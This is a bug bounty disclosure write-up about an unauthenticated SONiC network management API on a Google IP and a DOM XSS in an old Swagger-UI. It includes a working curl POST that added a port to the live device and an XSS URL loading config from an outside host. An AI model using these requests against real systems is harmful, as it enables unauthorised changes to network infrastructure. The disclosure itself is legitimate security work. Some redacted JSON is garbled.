[Google] Access to BGP server + DOM XSS

 A hacker could have had the access to a BGP REST API server without any authorisation which was leading to leak of internal network info, devices info, network configuration and modification. Apart from that, there was a DOM XSS vulnerability in the target IP asset as well.

POC -

An IP address had a BGP server running on it. The access to it was an API service "Sonic Network Management APIs".

These API calls could have been made without authorisation(access_token) and they were all listed with specifications on - "https://IP/ui/model.html".

Endpoints such as -

/ui/model.html?urls.primaryName=sonic-interface.yaml#/sonic-interface/get_sonic_interface_sonic_interface

/ui/model.html?urls.primaryName=sonic-port.yaml#/sonic-port/get_sonic_port_sonic_port

/ui/model.html?urls.primaryName=openconfig-lldp.yaml#/openconfig-lldp/get_openconfig_lldp_lldp_interfaces

/ui/model.html?urls.primaryName=openconfig-platform.yaml#/openconfig-platform/get_openconfig_platform_components

revealed info such as -

"sonic-interface:sonic-interface": { "INTERFACE": { "INTERFACE_IPADDR_LIST": [ "ip_prefix": "XXXX:XXXX::XX/64", "portname": "Ethernet248" "ip_prefix": "XXX.XXX.XX.XXtname": "Ethernet248 "INTERFACE_LIST": [ { "portname": "Ethernet248"

"state": { "chassis-id": "XX:XX:XX:60:XX:80", "chassis-id-type": "MAC_ADDRESS", "id": "10", "management-address": "", "port-description": "EDGELAB [T=pr36040][PortChannel17]", "port-id": "Eth1/49", "port-id-type": "LOCAL", "system-description": "SONiC Software Version: SONiC.4.0.1-Enterprise_Base - HwSku: DellXX-XX-XX-XX - Distribution: Debian 10.12 - Kernel: 4.19.0-9-2-amd64", "system-name": "XXXX9" } "id": "Ethernet4", "state": { "chassis-id": "XXXXXX", "chassis-id-type": "LOCAL", "id": "13", "management-address": "XX.XX.XX.XX,XXXX:11a:a025:XX::X", "port-description": "", "port-id": "eth0", "port-id-type": "INTERFACE_NAME", "system-description": "Google, XXX XXXX", "system-name": "XXXXXX"

"name": "System XXX", "state": { "description": "XXX_64-8102_64h_o-r0", "empty": false, "id": "8102-XXX-X", "location": "Slot 1", "mfg-name": "Cisco", "name": "System XXXXX", "oper-status": "openconfig-platform-types:ACTIVE", "part-no": "476277", "removable": false, "serial-no": "XXXXXXXXXXXXXX"

Additionally POST and DELETE were possible that would change the Network Configuration. To show the complete access, a port on the server was created as "hackingmonks".

curl -X POST "https://IP/restconf/data/sonic-port:sonic-port" -H "accept: application/yang-data+json" -H "Content-Type: application/yang-data+json" -d "{ \"sonic-port:PORT\": {\"PORT_LIST\": [ { \"admin_status\": \"up\", \"alias)": \"hackingmonks\", \"ifname\": \"Ethernet12\", \"index\": 3, \"lanes\": \"2324,2325, 2326, 2327\", \"mtu\": 9100, \"speed\":\"100000\"}

With the following response -

Code 201/content-length: 0/date: Fri, XX XXX XXXX 21:54:17 GMT/x-firefox-spdy: h2

Since the API specifications were hosted on an old version of Swagger-UI, it also was vulnerable to DOM XSS.

Dawid Moczadło has written a detailed article here.

The asset on - "https://IP/ui" was vulnerable to DOM XSS on this endpoint -

"/ui/model.html?configUrl=http://hackingmonks/test.json".

Timeline -

Reported - 25.05.2023

Triaged - 25.05.2023

Lost access to the service - 3.6.2023

Accepted - 15.06.2023

Rewarded - 27.06.2023

Fixed - 31.08.2023